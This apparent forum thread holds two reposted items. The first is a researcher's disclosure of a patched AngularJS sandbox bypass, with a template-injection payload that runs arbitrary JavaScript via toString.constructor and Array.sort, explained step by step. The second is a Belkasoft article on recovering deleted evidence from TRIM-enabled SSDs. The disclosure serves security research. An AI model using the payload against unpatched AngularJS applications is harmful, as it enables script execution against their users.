  24. ___ __ _______ _____ ____ __ / | ____ ____ ___ __/ /___ ______ / / ___/ / ___/____ _____ ____/ / /_ ____ _ __ / /_ __ ______ ____ ___________ / /| | / __ \/ __ `/ / / / / __ `/ ___/_ / /\__ \ \__ \/ __ `/ __ \/ __ / __ \/ __ \| |/_/ / __ \/ / / / __ \/ __ `/ ___/ ___/ / ___ |/ / / / /_/ / /_/ / / /_/ / / / /_/ /___/ / ___/ / /_/ / / / / /_/ / /_/ / /_/ /> < / /_/ / /_/ / /_/ / /_/ (__ |__ ) /_/ |_/_/ /_/\__, /\__,_/_/\__,_/_/ \____//____/ /____/\__,_/_/ /_/\__,_/_.___/\____/_/|_| /_.___/\__, / .___/\__,_/____/____/ /____/ /____/_/ In my recent research I discovered a bypass to the AngularJS "sandbox", allowing me to execute arbitrary JavaScript from within the Angular scope, while not breaking any of the implemented rules (eg. Function constructor can't be accessed directly). The main reason I was allowed to do this is because functions executing callbacks, such as Array.sort(), Array.map() and Array.filter() are allowed. If we use the Function constructor as callback, we can carefully construct a payload that generates a valid function that we control both the arguments for, as well as the function body. This results in a sandbox bypass. Example: {{toString.constructor.prototype.toString=toString .constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}} JSFiddle: http://jsfiddle.net/uwwov8oz Let's break that down. Function constructor can be accessed via toString.constructor. {{Function.prototype.toString=Function.prototype.c all;["a","alert(1)"].sort(Function)}} We can run the Function constructor with controlled arguments with ["a", "alert(1)"].sort(Function). This will generate this psuedo-code: if(Function("a","alert(1)") > 1){ //Sort element "a" as bigger than "alert(1)" }else if(Function("a","alert(1)") < 1){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } Function("a","alert(1)") is equivalent to function(a){alert(1)}. So let's edit that. if((function(a){alert(1)}) > 1){ //Sort element "a" as bigger than "alert(1)" }else if((function(a){alert(1)}) < 1){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } Now, to understand the next part we must know how JS internals handles comparison of functions. It will convert the function to a string using the toString method (inherited from Object) and compare it as string. We can show this by running this code: alert==alert.toString(). if((function(a){alert(1)}).toString() > 1..toString()){ //Sort element "a" as bigger than "alert(1)" }else if((function(a){alert(1)}).toString() < 1..toString()){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } So to sum up: We can create a function where we control the arguments ("a"), as well as the function body ("alert(1)"), and that generated function will be converted to a string using the toString() function. So all we have to do is replace the Function.prototype.toString() function with the Function.prototype.call() function, and when the comparison runs in the psuedocode, it will run like this: if((function(a){alert(1)}).call() > 1..toString()){ //Sort element "a" as bigger than "alert(1)" }else if((function(a){alert(1)}).call() < 1..toString()){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } Since (function(a){alert(1)}).call() is a perfectly valid way of creating and executing a function, and given that we control both the arguments and the function body, we can safely assume that we can execute arbitrary JavaScript using this method. The same logic can be applied to the other callback functions. I'm not really sure why using the constructor property like this (eg. toString.constructor) works, since it didn't in 1.2.18 and down. Last, this is now fixed as of AngularJS version 1.2.24 and up (only 1 week from original report until patch!) and I got $5000 bug bounty for this bypass Changelog: https://github.com/angular/angular.js/commit/b39e1d47b9a1b39a9fe34c847a81f589fba522f8 over and out, avlidienbrunn Video: Sursa: http://avlidienbrunn.se/angular.txt
  25. Recovering Evidence from SSD Drives in 2014: Understanding TRIM, Garbage Collection and Exclusions Posted by belkasoft ? September 23, 2014 We published an article on SSD forensics in 2012. SSD self-corrosion, TRIM and garbage collection were little known and poorly understood phenomena at that time, while encrypting and compressing SSD controllers were relatively uncommon. In 2014, many changes happened. We processed numerous cases involving the use of SSD drives and gathered a lot of statistical data. We now know more about many exclusions from SSD self-corrosion that allow forensic specialists to obtain more information from SSD drives. Introduction Several years ago, Solid State drives (SSD) introduced a challenge to digital forensic specialists. Forensic acquisition of computers equipped with SSD storage became very different compared to acquisition of traditional hard drives. Instead of straightforward and predictable recovery of evidence, we are in the waters of stochastic forensics with SSD drives, where nothing can be assumed as a given. With even the most recent publications not going beyond introducing the TRIM command and making a conclusion on SSD self-corrosion, it has been common knowledge – and a common misconception, – that deleted evidence cannot be extracted from TRIM-enabled SSD drives, due to the operation of background garbage collection. However, there are so many exceptions that they themselves become a rule. TRIM does not engage in most RAID environments or on external SSD drives attached as a USB enclosure or connected via a FireWire port. TRIM does not function in a NAS. Older versions of Windows do not support TRIM. In Windows, TRIM is not engaged on file systems other than NTFS. There are specific considerations for encrypted volumes stored on SSD drives, as various crypto containers implement vastly different methods of handling SSD TRIM commands. And what about slack space (which has a new meaning on an SSD) and data stored in NTFS MFT attributes? Different SSD drives handle after-TRIM reads differently. Firmware bugs are common in SSD drives, greatly affecting evidence recoverability. Finally, the TRIM command is not issued (and garbage collection does not occur) in the case of data corruption, for example, if the boot sector or partition tables are physically wiped. Self-encrypting SSD drives require a different approach altogether, while SSD drives using compressing controllers cannot be practically imaged with off-chip acquisition hardware. Our new research covers many areas where evidence is still recoverable – even on today’s TRIM-enabled SSD drives. SSD Self-Corrosion In case you haven’t read our 2012 paper on SSD forensics, let’s stop briefly on why SSD forensics is different. The operating principle of SSD media (as opposed to magnetic or traditional flash-based storage) allows access to existing information (files and folders) stored on the disk. Deleted files and data that a suspect attempted to destroy (by e.g. formatting the disk, even if “Quick Format” was engaged) may be lost forever in a matter of minutes. And even shutting the affected computer down immediately after a destructive command has been issued, does not stop the destruction. Once the power is back on, the SSD drive will continue wiping its content clear all by itself, even if installed into a write-blocking imaging device. If a self-destruction process has already started, there is no practical way of stopping it unless we’re talking of some extremely important evidence, in which case the disk accompanied with a court order can be sent to the manufacturer for low-level, hardware-specific recovery. The evidence self-destruction process is triggered with the TRIM command issued by the operating system to the SSD controller at the time the user deletes a file, formats the disk or deletes a partition. The TRIM operation is fully integrated with partition- and volume-level commands. This includes formatting the disk or deleting partitions; file system commands responsible for truncating and compressing data, and System Restore (Volume Snapshot) operations. Note that the data destruction process is only triggered by the TRIM command, which must be issued by the operating system. However, in many cases the TRIM command is NOT issued. In this paper, we concentrate on these exclusions, allowing investigators to gain better understanding of situations when deleted data can still be recovered from an SSD drive. However, before we begin that part, let’s see how SSD drives of 2014 are different from SSD drives made in 2012. Checking TRIM Status When analyzing a live system, it is easy to check a TRIM status for a particular SSD device by issuing the following command in a terminal window: fsutil behavior query disabledeletenotify You’ll get one of the following results: DisableDeleteNotify = 1 meaning that Windows TRIM commands are disabled DisableDeleteNotify = 0 meaning that Windows TRIM commands are enabled fsutil is a standard tool in Windows 7, 8, and 8.1. On a side note, it is possible to enable TRIM with “fsutil behavior set disabledeletenotify 0” or disable TRIM with “fsutil behavior set disabledeletenotify 1“. Figure 1 TRIM, image taken from http:/www.corsair.com/us/blog/how-to-check-that-trim-is-active/ Note that using this command only makes sense if analyzing the SSD which is still installed in its original computer (e.g. during a live box analysis). If the SSD drive is moved to a different system, the results of this command are no longer relevant. SSD Technology: 2014 Back in 2012, practically all SSD drives were already equipped with background garbage collection technology and recognized the TRIM command. This did not change in 2014. Two years ago, SSD compression already existed in SandForce SSD Controllers (http:/en.wikipedia.org/wiki/SandForce). However, relatively few models were equipped with encrypting or compressing controllers. As SandForce remained the only compressing controller, it was easy to determine whether it was the case. (http:/www.enterprisestorageforum.com/technology/features/article.php/3930601/Real-Time-Data-Compressions-Impact-on–SSD-Throughput-Capability-.htm). In 2013, Intel used a custom-firmware controlled version of a SandForce controller to implement data compression in 3xx and 5xx series SSDs (http:/www.intel.com/support/ssdc/hpssd/sb/CS-034537.htm), claiming reduced write amplification and increased endurance of a SSD as the inherent benefits (http:/www.intel.de/content/dam/www/public/us/en/documents/technology-briefs/ssd-520-tech-brief.pdf). Marvell controllers are still non-compressing (http:/blog.goplextor.com/?p=3313), and so are most other controllers on the market including the new budget option, Phison. Why so much fuzz about data compression in SSD drives? Because the use of any technology altering binary data before it ends up in the flash chips makes its recovery with third-party off-chip hardware much more difficult. Regardless of whether compression is present or not, we have not seen many successful implementations of SSD off-chip acquisition products so far, TEEL Tech (http:/www.teeltech.com/mobile-device-forensics-training/advanced-bga-chip-off-forensics/) being one of rare exceptions. Let’s conclude this chapter with a quote from PC World: “The bottom line is that SSDs still are a capacity game: people buy the largest amount of storage they can within their budget, and they ignore the rest.” http:/www.pcworld.com/article/2087480/ssd-prices-face-uncertain-future-in-2014.html In other words, SSD’s get bigger and cheaper, inevitably demanding some cost-saving measures which, in turn, may affect how deleted data are handled on these SSD drives in a way described later in the Reality Steps In: Why SSDs from Sub-Notes are Recoverable chapter. SSD Manufacturers In recent years, we’ve seen a lot of new SSD “manufacturers” entering the arena. These companies don’t normally build their own hardware or design their own firmware. Instead, they simply spec out the disks to a real manufacturer that assembles the drives based on one or another platform (typically, SandForce or Phison) and one or another type, make and size of flash memory. In the context of SSD forensics, these drives are of interest exactly because they all feature a limited choice of chipsets and a limited number of firmware revisions. In fact, just two chipset makers, SandForce and Phison, enabled dozens of “manufacturers” make hundreds of nearly indistinguishable SSD models. So who are the real makers of SSD drives? According to Samsung, we have the following picture: (Source: http:/www.kitguru.net/components/ssd-drives/anton-shilov/samsung-remains-the-worlds-largest-maker-of-ssds-gartner/) Hardware for SSD Forensics (and Why It Has Not Arrived) Little has changed since 2012 in regards to SSD-specific acquisition hardware. Commonly available SATA-compliant write-blocking forensic acquisition hardware is used predominantly to image SSD drives, with BGA flash chip acquisition kits rare as hen’s teeth. Why so few chip-off solutions for SSD drives compared to the number of companies doing mobile chip-off? It’s hard to say for sure, but it’s possible that most digital forensic specialists are happy with what they can extract via the SATA link (while there is no similar interface in most mobile devices). Besides, internal data structures in today’s SSD drives are extremely complex. Constant remapping and shuffling of data during performance and lifespan optimization routines make actual data content stored on the flash chips inside SSD drives heavily fragmented. We’re not talking about logical fragmentation on file system level (which already is a problem as SSD drives are never logically defragmented), but rather physical fragmentation that makes an SSD controller scatter data blocks belonging to a contiguous file to various physical addresses on numerous physical flash chips. In particular, massive parallel writes are what make SSD drives so much faster than traditional magnetic drives (as opposed to sheer writing speed of single flash chips). One more word regarding SSD acquisition hardware: write-blocking devices. Note that write-blocking imaging hardware does not stop SSD self-corrosion. If the TRIM command has been issued, the SSD drive will continue erasing released data blocks at its own pace. Whether or not some remnants of deleted data can be acquired from the SSD drive depends as much on acquisition technique (and speed), as on particular implementation of a particular SSD controller. Deterministic Read After Trim So let’s say we know that the suspect erased important evidence or formatted the disk just minutes before arrest. The SSD drive has been obtained and available for imaging. What exactly should an investigator expect to obtain from this SSD drive? Reported experience while recovering information from SSD drives varies greatly among SSD users. “I ran a test on my SSD drive, deleting 1000 files and running a data recovery tool 5 minutes after. The tool discovered several hundred files, but an attempt to recover returned a bunch of empty files filled with zeroes”, said one Belkasoft customer. “We used Belkasoft Evidence Center to analyze an SSD drive obtained from the suspect’s laptop. We were able to recover 80% of deleted files in several hours after they’ve been deleted”, said another Belkasoft user. Carving options in Belkasoft Evidence Center: for the experiment we set Unallocated clusters only and SSD drive connected as physical drive 0. Why such a big inconsistency in user experiences? The answer lies in the way the different SSD drives handle trimmed data pages. Some SSD drives implement what is called Deterministic Read After Trim (DRAT) and Deterministic Zeroes After Trim (DZAT), returning all-zeroes immediately after the TRIM command released a certain data block, while some other drives do not implement this protocol and will return the original data until it’s physically erased with the garbage collection algorithm. Deterministic Read After Trim and Deterministic Zeroes After Trim have been part of the SATA specification for a long time. Linux users can verify that their SSD drives are using DRAT or DZAT by issuing the hdparm -I command returning whether the drive supports TRIM and does “Deterministic Read After Trim”. Example: $ sudo hdparm -I /dev/sda | grep -i trim * Data Set Management TRIM supported (limit 1 block) * Deterministic read data after TRIM However, the adoption of DRAT has been steadily increasing among SSD manufacturers. Two years ago we often saw reports on SSD drives with and without DRAT support. In 2014, the majority of new models came equipped with DRAT or DZAT. There are three different types of TRIM defined in the SATA protocol and implemented in different SSD drives. Non-deterministic TRIM: each read command after a Trim may return different data. Deterministic Trim (DRAT): all read commands after a TRIM shall return the same data, or become determinate. Note that this level of TRIM does not necessarily return all-zeroes when trimmed pages are accessed. Instead, DRAT guarantees that the data returned when accessing a trimmed page will be the same (“determined”) before and after the affected page has been processed by the garbage collection algorithm and until the page is written new data. As a result, the data returned by SSD drives supporting DRAT as opposed to DZAT can be all zeroes or other words of data, or it could be the original pre-trim data stored in that logical page. The essential point here is that the values read from a trimmed logical page do not change since the moment the TRIM command has been issued and before the moment new data get written into that logical page. Deterministic Read Zero after Trim (DZAT): all read commands after a TRIM shall return zeroes until the page is written new data. As we can see, in some cases the SSD will return non-original data (all zeroes, all ones, or some other non-original data) not because the physical blocks have been cleaned immediately following the TRIM command, but because the SSD controller tells that there is no valid data held at the trimmed address on a logical level previously associated with the trimmed physical block. If, however, one could possibly read the data directly from the physical blocks mapped to the logical blocks that have been trimmed, then the original data could be obtained from those physical blocks until the blocks are physically erased by the garbage collector. Apparently, there is no way to address the physical data blocks via the standard ATA command set, however, the disk manufacturer could most probably do this in their own lab. As a result, sending the trimmed SSD disk for recovery to the manufacturer may be a viable proposition if some extremely important evidence is concerned. Notably, DRAT is not implemented in Windows, as NTFS does not allow applications reading the trimmed data. Acquiring Evidence from SSD Drives So far the only practical way of obtaining evidence from an SSD drive remains the traditional imaging (with dedicated hardware/software combination), followed by an analysis with an evidence discovery tool (such as Belkasoft Evidence Center, http:/forensic.belkasoft.com/en/bec/en/evidence_center.asp). We now know more about the expected outcome when analyzing an SSD drive. There are generally two scenarios: either the SSD only contains existing data (files and folders, traces of deleted data in MFT attributes, unallocated space carrying no information), or the SSD contains the full information (destroyed evidence still available in unallocated disk space).Today, we can predict which scenario is going to happen by investigating conditions in which the SSD drive has been used. Scenario 1: Existing Files Only In this scenario, the SSD may contain some files and folders, but free disk space will be truly empty (as in “filled with zero data”). As a result, carving free disk space will return no information or only traces of information, while carving the entire disk space will only return data contained in existing files. So, is file carving useless on SSD drives? No way! Carving is the only practical way of locating moved or hidden evidence (e.g. renamed history files or documents stored in the Windows\System32 folder and renamed to .SYS or .DLL). Practically speaking, the same acquisition and analysis methods should be applied to an SSD drive as if we were analyzing a traditional magnetic disk. Granted, we’ll recover no or little destroyed evidence, but any evidence contained in existing files including e.g., deleted records from SQLite databases (used, for example, in Skype histories) can still be recovered (http:/forensic.belkasoft.com/en/recover-destroyed-sqlite-evidence-skype-and-iphone-logs). Scenario 2: Full Disk Content In the second scenario, the SSD disk will still contain the complete set of information – just like traditional magnetic disks. Obviously, all the usual techniques should be applied at the analysis stage including file carving. Why would an SSD drive NOT destroy evidence as a result of routine garbage collection? The garbage collection algorithm erasing the content of released data blocks does not occur if the TRIM command has not been issued, or if the TRIM protocol is not supported by any link of the chain. Let’s see in which cases this could happen. More than 1000 items were carved out of unallocated sectors of SSD hard drive, particularly, Internet Explorer history, Skype conversations, SQLite databases, system files and other forensically important types of data Operating System Support TRIM is a property of the operating system as much as it is the property of an SSD device. Older file systems do not support TRIM. Wikipedia http:/en.wikipedia.org/wiki/Trim_(computing) has a comprehensive table detailing the operating system support for the TRIM command. [TABLE] [TR] [TD]Operating System[/TD] [TD]Supported since[/TD] [TD]Notes[/TD] [/TR] [TR] [TD]DragonFly BSD[/TD] [TD]2011-05 May 2011[/TD] [TD][/TD] [/TR] [TR] [TD]FreeBSD[/TD] [TD]2010-078.1 – July 2010[/TD] [TD]Support was added at the block device layer in 8.1. File system support was added in FreeBSD 8.3 and FreeBSD 9, beginning with UFS. ZFS trimming support was added in FreeBSD 9.2. FreeBSD 10 will support trimming on software RAID configurations.[/TD] [/TR] [TR] [TD]Linux[/TD] [TD]2008-12-252.6.28-25 December 2008[/TD] [TD]Initial support for discard operations was added for FTL NAND flash devices in 2.6.28. Support for the ATA Trim command was added in 2.6.33.Not all file systems make use of Trim. Among the file systems that can issue Trim requests automatically are Ext4, Btrfs, FAT, GFS2 and XFS. However, this is disabled by default, due to performance concerns, but it can be enabled by setting the “discard” mount option. Ext3, NILFS2 and OCFS2 offer ioctls to perform offline trimming. The Trim specification calls for supporting a list of trim ranges, but as of kernel 3.0 trim is only invoked with a single range that is slower.[/TD] [/TR] [TR] [TD]Mac OS X[/TD] [TD]2011-06-2310.6.8 -23 June 2011[/TD] [TD]Although the AHCI block device driver gained the ability to display whether a device supports the Trim operation in 10.6.6 (10J3210), the functionality itself remained inaccessible until 10.6.8, when the Trim operation was exposed via the IOStorageFamily and file system (HFS+) support was added. Some online forums state that Mac OS X only supports Trim for Apple-branded SSDs; third-party utilities are available to enable it for other brands.[/TD] [/TR] [TR] [TD]Microsoft Windows[/TD] [TD]2009-10NT 6.1 (Windows 7 and Windows Server 2008 R2) – October 2009[/TD] [TD]Windows 7 only supports trim for ordinary (SATA) drives and does not support this command for PCI-Express SSDs that are different type of device, even if the device itself would accept the command. It is confirmed that with native Microsoft drivers the Trim command works in AHCI and legacy IDE / ATA Mode.[/TD] [/TR] [TR] [TD]OpenSolaris[/TD] [TD]2010-07 July 2010[/TD] [TD][/TD] [/TR] [TR] [TD]Android[/TD] [TD]2013-74.3 – 24 July 2013[/TD] [TD][/TD] [/TR] [/TABLE] Old Versions of Windows As shown in the table above, TRIM support was only added to Windows 7. Obviously, TRIM is supported in Windows 8 and 8.1. In Windows Vista and earlier, the TRIM protocol is not supported, and the TRIM command is not issued. As a result, when analyzing an SSD drive obtained from a system featuring one of the older versions of Windows, it is possible to obtain the full content of the device. Possible exception: TRIM-like performance can be enabled via certain third-party solutions (e.g. Intel SSD Optimizer, a part of Intel SSD Toolbox). MacOS X Mac OS X started supporting the TRIM command for Apple supplied SSD drives since version 10.6.8. Older builds of Mac OS X do not support TRIM. Notably, user-installed SSD drives not supplied by Apple itself are excluded from TRIM support. Old or Basic SSD Hardware Not all SSD drives support TRIM and/or background garbage collection. Older SSD drives as well as SSD-like flash media used in basic tablets and sub-notes (such as certain models of ASUS Eee) do not support the TRIM command. For example, Intel started manufacturing TRIM-enabled SSD drives with drive lithography of 34nm (G2); their 50nm SSDs do not have TRIM support. In reality, few SSD drives without TRIM survived that long. Many entry-level sub-notebooks use flash-based storage often mislabeled as “SSD” that does not feature garbage collection or supports the TRIM protocol. (Windows) File Systems Other than NTFS TRIM is a feature of the file system as much as the property of an SSD drive. At this time, Windows only supports TRIM on NTFS-formatted partitions. Volumes formatted with FAT, FAT32 and exFAT are excluded. Notably, some (older) SSD drives used trickery to work around the lack of TRIM support by trying to interpret the file system, attempting to erase dirty blocks not referenced from the file system. This approach, when enabled, only works for the FAT file system since it’s a published spec. (http:/www.snia.org/sites/default/files2/sdc_archives/2009_presentations/thursday/NealChristiansen_ATA_TrimDeleteNotification_Windows7.pdf) External drives, USB enclosures and NAS The TRIM command is fully supported over the SATA interface, including the eSATA extension, as well as SCSI via the UNMAP command. If an SSD drive is used in a USB enclosure or installed in most models of NAS devices, the TRIM command will not be communicated via the unsupported interface. [TABLE] [TR] [TD] [TABLE] [TR] [TD]YES[/TD] [/TR] [/TABLE] [/TD] [TD] [TABLE] [TR] [TD]NO[/TD] [/TR] [/TABLE] [/TD] [/TR] [/TABLE] There is a notable exception. Some NAS manufacturers start recognizing the demand for units with ultra-high performance, low power consumption and noise free operation provided by SSD drives, slowly adopting TRIM in some of their models. At the time of this writing, of all manufacturers only Synology appears to support TRIM in a few select models of NAS devices and SSD drives. Here is a quote from Synology Web site (https:/www.synology.com/en-uk/support/faq/591): SSD TRIM improves the read and write performance of volumes created on SSDs, increasing efficiency as well as extending the lifetime of your SSDs. See the list below for verified SSD with TRIM support. · You may customize a schedule to choose when the system will perform TRIM. · SSD TRIM is not available when an SHA cluster exists. · TRIM cannot be enabled on iSCSI LUN. · The TRIM feature under RAID 5 and 6 configurations can only be enabled on the SSDs with DZAT (Deterministic Read Zero after TRIM) support. Please contact your SSD manufacturers for details on DZAT support. PCI-Express and PCIe SSDs Interestingly, the TRIM command is not natively supported by any version of Windows for many high-performance SSD drives occupying the PCI Express slot. Do not confuse PCI Express SSD’s with SATA drives carrying M.2 or mSATA interfaces. Possible exception: TRIM-like performance can be enabled via certain third-party solutions (e.g., Intel SSD Optimizer, a part of Intel SSD Toolbox). RAID The TRIM command is not yet supported over RAID configurations (with few rare exceptions). SSD drives working as part of a RAID array can be analyzed. A notable exception from this rule would be the modern RAID 0 setup using a compatible chipset (such as Intel H67, Z77, Z87, H87, Z68) accompanied with the correct drivers (the latest RST driver from Intel allegedly works) and a recent version of BIOS. In these configurations, TRIM can be enabled. Corrupted Data Surprisingly, SSD drives with corrupted system areas (damaged partition tables, skewed file systems, etc.) are easier to recover than healthy ones. The TRIM command is not issued over corrupted areas because files are not properly deleted. They simply become invisible or inaccessible to the operating systems. Many commercially available data recovery tools (e.g., Intel® Solid-State Drive Toolbox with Intel® SSD Optimizer, OCZ SSD Toolbox) can reliably extract information from logically corrupted SSD drives. Bugs in SSD Firmware Firmware used in SSD drives may contain bugs, often affecting the TRIM functionality and/or messing up garbage collection. Just to show an example, OCZ Agility 3 120 GB shipped with buggy firmware v. 2.09, in which TRIM did not work. Firmware v. 2.15 fixed TRIM behavior, while v. 2.22 introduced issues with data loss on wake-up after sleep, then firmware v. 2.25 fixed that but disrupted TRIM operation again (information taken from http:/www.overclock.net/t/1330730/ocz-firmware-2-25-trim-doesnt-work-bug-regression-bad-ocz-experience). A particular SSD drive may or may not be recoverable depending on which bugs were present in its firmware. Bugs in SSD Over-Provisioning SSD over-provisioning is one of the many wear-leveling mechanisms intended for increasing SSD life span. Some areas on the disk are reserved on the controller level, meaning that a 120 GB SSD drive carries more than 120 GB of physical memory. These extra data blocks are called over-provisioning area (OP area), and can be used by SSD controllers when a fresh block is required for a write operation. A dirty block will then enter the OP pool, and will be erased by the garbage collection mechanism during the drive’s idle time. Speaking of SSD over-provisioning, firmware bugs can affect TRIM behavior in other ways, for example, revealing trimmed data after a reboot/power off. Solid-state drives are remapping constantly after TRIM to allocate addresses out of the OP pool. As a result, the SSD reports a trimmed data block as writeable (already erased) immediately after TRIM. Obviously, the drive did not have the time to actually clean old data from that block. Instead, it simply maps a physical block from the OP pool to the address referred to by the trimmed logical block. What happens to the data stored in the old block? For a while, it contains the original data (in many cases it’s compressed data, depending on the SSD controller). However, as that data block is mapped out of the addressable logical space, the original data is no longer accessible or addressable. Sounds complex? You bet. That’s why even seasoned SSD manufacturers may not get it right at the first try. Issues like this can cause problems when, after deleting data and rebooting the PC, some users would see the old data back as if it was never deleted. Apparently, because of the mapping issue the new pointers would not work as they should, due to a bug in the drive’s firmware. OCZ released a firmware fix to correct this behavior, but similar (or other) bugs may still affect other drives. SSD Shadiness: Manufacturers Bait-and-Switch When choosing an SSD drive, customers tend to read online reviews. Normally, when the new drive gets released, it is getting reviewed by various sources soon after it becomes available. The reviews get published, and customers often base their choice on them. But what if a manufacturer silently changes the drive’s specs without changing the model number? In this case, an SSD drive that used to have great reviews suddenly becomes much less attractive. This is exactly what happened with some manufacturers. According to ExtremeTech (http:/www.extremetech.com/extreme/184253-ssd-shadiness-kingston-and-pny-caught-bait-and-switching-cheaper-components-after-good-reviews), two well-known SSD manufacturers, Kingston and PNY, were caught bait-and-switching cheaper components after getting the good reviews. In this case, the two manufacturers were launching their SSDs with one hardware specification, and then quietly changed the hardware configuration after reviews have gone out. So what’s in there for us? Well, the forensic-friendly SandForce controller was found in the second revision of PNY Optima drives. Instead of the original Silicon Motion controller, the new batch of PNY Optima drives had a different, SandForce-based controller known for its less-than-perfect implementation of garbage collection leaving data on the disk for a long time after it’s been deleted. Small Files: Slack Space Remnants of deleted evidence can be acquired from so-called slack space as well as from MFT attributes. In the word of SSD, the term “slack space” receives a new meaning. Rather than being a matter of file and cluster size alignment, “slack space” in SSD drives deals with the different sizes of minimum writeable and minimum erasable blocks on a physical level. Micron, the manufacturer of NAND chips used in many SSD drives, published a comprehensive article on SSD structure: https:/www.micron.com/~/media/Documents/Products/Technical%20Marketing%20Brief/ssd_effect_data_placement_writes_tech_brief.pdf In SSD terms, Page is the smallest unit of storage that can be written to. The typical page size of today’s SSD is 4 KB or 8 KB. Block, on the other hand, is the smallest unit of storage that can be erased. Depending on the design of a particular SSD drive, a single block may contain 128 to 256 pages. As a result, if a file is deleted and its size is less than the size of a single SSD data block, OR if a particular SSD data block contain pages that still remain allocated, that particular block is NOT erased by the garbage collection algorithm. In practical terms, this means that files or file fragments (chunks) sized less than 512 KB or less than 2 MB depending on SSD model, may not be affected by the TRIM command, and may still be forensically recoverable. However, the implementation of the Deterministic Read After Trim (DRAT) protocol by many recent SSD drives makes trimmed pages inaccessible via standard SATA commands. If a particular SSD drive implements DRAT or DZAT (Deterministic Read Zero After Trim), the actual data may physically reside on the drive for a long time, yet it will be unavailable to forensic specialists via standard acquisition techniques. Sending the SSD drive to the manufacturer might be the only way of obtaining this information on a physical level. Small Files: MFT Attributes Most hard drives used in Windows systems are using NTFS as their file system. NTFS stores information about the files and directories in the Master File Table (MFT). MFT contains information about all files and directories listed in the file system. In other words, each file or directory has at least one record in MFT. In terms of computer forensics, one particular feature of MFT is of great interest. Unique to NTFS is the ability to store small files directly in the file system. The entire content of a small file can be stored as an attribute inside an MFT record, greatly improving reading performance and decreasing wasted disk space (“slack” space), referenced in the previous chapter. As a result, small files being deleted are not going anywhere. Their entire content continues residing in the file system. The MFT records are not emptied, and are not affected by the TRIM command. This in turn allows investigators recovering such resident files by carving the file system. How small does a file have to be to fit inside an MFT record? Very small. The maximum size of a resident file cannot exceed 982 bytes. Obviously, this severely limits the value of resident files for the purpose of digital forensics. Encrypted Volumes Somewhat counter-intuitively, information deleted from certain types of encrypted volumes (some configurations of BitLocker, TrueCrypt, PGP and other containers) may be easier to recover as it may not be affected by the TRIM command. Files deleted from such encrypted volumes stored on an SSD drive can be recovered (unless they were specifically wiped by the user) if the investigator knows either the original password or binary decryption keys for the volume. Encrypted containers are a big topic, so we’ll cover it in a dedicated chapter. TRIM on encrypted volumes is a huge topic well worth a dedicated article or even a series of articles. With the large number of crypto containers floating around and all the different security considerations and available configuration options, determining whether TRIM was enabled on a particular encrypted volume is less than straightforward. Let’s try assembling a brief summary on some of the most popular encryption options. Apple FileVault 2 Introduced with Apple OS X “Lion”, FileVault 2 enables whole-disk encryption. More precisely, FileVault 2 enables whole-volume encryption only on HFS+ volumes (Encrypted HFS). Apple chose to enable TRIM with FileVault 2 volumes on drives. It has the expected security implication of free sectors/blocks being revealed. Microsoft BitLocker Microsoft has its own built-in version of volume-level encryption called BitLocker. Microsoft made the same choice as Apple, enabling TRIM on BitLocker volumes located on SSD drives. As usual for Microsoft Windows, the TRIM command is only available on NTFS volumes. TrueCrypt TrueCrypt supports TRIM pass-through on encrypted volumes located on SSD drives. The company issued several security warnings in relation to wear-levelling security issues and the TRIM command revealing information about which blocks are in use and which are not. (http:/www.truecrypt.org/docs/trim-operation and http:/www.truecrypt.org/docs/wear-leveling) PGP Whole Disk Encryption By default, PGP whole-disk encryption does not enable TRIM on encrypted volumes. However, considering wear-leveling issues of SSD drives, Symantec introduced an option to enable TRIM on SSD volumes via a command line option: –fast (http:/www.symantec.com/connect/forums/pgp-and-ssd-wear-leveling). If an encrypted volume of a fixed size is created, the default behavior is also to encrypt the entire content of a file representing the encrypted volume, which disables the effect of the TRIM command for the contents of the encrypted volume. More research is required to investigate these options. At this time one thing is clear: in many configurations, including default ones, files deleted from encrypted volumes will not be affected by the TRIM command. Which brings us to the question of the correct acquisition of PCs with encrypted volumes. Forensic Acquisition: The Right Way to Do The right way to acquire a PC with a crypto container can be described with the following sentence: “If it’s running, don’t turn it off. If it’s off, don’t turn it on.” Indeed, the original decryption keys are cached in the computer’s memory, and can be extracted from a LiveRAM dump obtained from a running computer by performing a FireWire attack. These keys can be contained in page files and hibernation files. Tools such as Passware can extract decryption files from memory dumps and page/hibernation files, decrypting the content of encrypted volumes. Reality Steps In: Why Real SSDs are Often Recoverable In reality, things may look different from what was just described above in such great technical detail. In our lab, we’ve seen hundreds of SSD drives acquired from a variety of computers. Surprisingly, Belkasoft Evidence Center was able to successfully carve deleted data from the majority of SSD drives taken from inexpensive laptops and sub-notebooks such as ASUS Eee or ASUS Zenbook. Why is it so? There are several reasons, mainly “cost savings” and “miniaturization”, but sometimes it’s simply over-engineering. Inexpensive laptops often use flash-based storage, calling that an SSD in their marketing ploy. In fact, in most cases it’s just a slow, inexpensive and fairly small flash-based storage having nothing to do with real SSD drives. Ultrabooks and sub-notes have no space to fit a full-size SSD drive. They used to use SSD drives in PCIe form factor (as opposed to M.2 or mSATA) which did not support the SATA protocol. Even if these drives are compatible with the TRIM protocol, Windows does not support TRIM on non-ATA devices. As a result, TRIM is not enabled on these drives. SSD drives are extremely complex devices requiring extremely complex firmware to operate. Many SSD drives were released with buggy firmware effectively disabling the effects of TRIM and garbage collection. If the user has not upgraded their SSD firmware to a working version, the original data may reside on an SSD drive for a long time. The fairly small (and inexpensive) SSD drives used in many entry-level notebooks lack support for DRAT/DZAT. As a result, deleted (and trimmed) data remain accessible for a long time, and can be successfully carved from a promptly captured disk image. On the other end of the spectrum are the very high-end, over-engineered devices. For example, Acer advertises its Aspire S7-392 as having a RAID 0 SSD. According to Acer marketing, “RAID 0 solid state drives are up to 2X faster than conventional SSDs. Access your files and transfer photos and movies quicker than ever!” (http:/www.acer.com/aspires7/en_US/). This looks like over-engineering. As TRIM is not enabled on RAID SSD’s in any version of Windows, this ultra-fast non-conventional storage system may slow down drastically over time (which is exactly why TRIM was invented in the first place). For us, this means that any data deleted from these storage systems could remain there for at least as long as it would have remained on a traditional magnetic disk. Of course, the use of the right chipset (such as Intel H67, Z77, Z87, H87, Z68) accompanied with the correct drivers (the latest RST driver from Intel allegedly works) can in turn enable TRIM back. However, we are yet to see how this works in reality. (http:/www.anandtech.com/show/6477/trim-raid0-ssd-arrays-work-with-intel-6series-motherboards-too) 